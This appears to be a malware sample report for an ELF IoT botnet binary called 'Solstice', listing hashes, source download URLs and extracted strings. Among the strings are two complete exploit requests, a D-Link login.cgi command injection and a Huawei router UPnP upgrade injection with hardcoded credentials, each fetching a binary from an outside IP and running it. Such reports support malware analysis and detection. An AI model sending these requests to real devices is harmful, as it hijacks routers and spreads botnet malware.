Sample details: ac29908a0d3df431e1e57ba7e44e9424 --

Hashes
MD5: ac29908a0d3df431e1e57ba7e44e9424
SHA1: 75103cb685c7af94eb7f60e700bcab92d23c4af5
SHA256: 71be4a069039d14903ad69362f8746dcadc07a956dae855b83d2da1bbddb8b43
SSDEEP: 1536:U+2pO3TgJjuWu+hDkgajHCXyUDUpJ9RXGKDtJ9T1:T2VAjHCXbD2J9QK7f
Details
File Type: ELF
Yara Hits
Source
http://185.101.105.163/bins/Solstice.spc
http://185.101.105.162/bins/Solstice.spc
Strings
		POST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
iemjpemjav
fgtf/wavmeh'
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
?/dev/null
.shstrtab
.rodata
.ctors
.dtors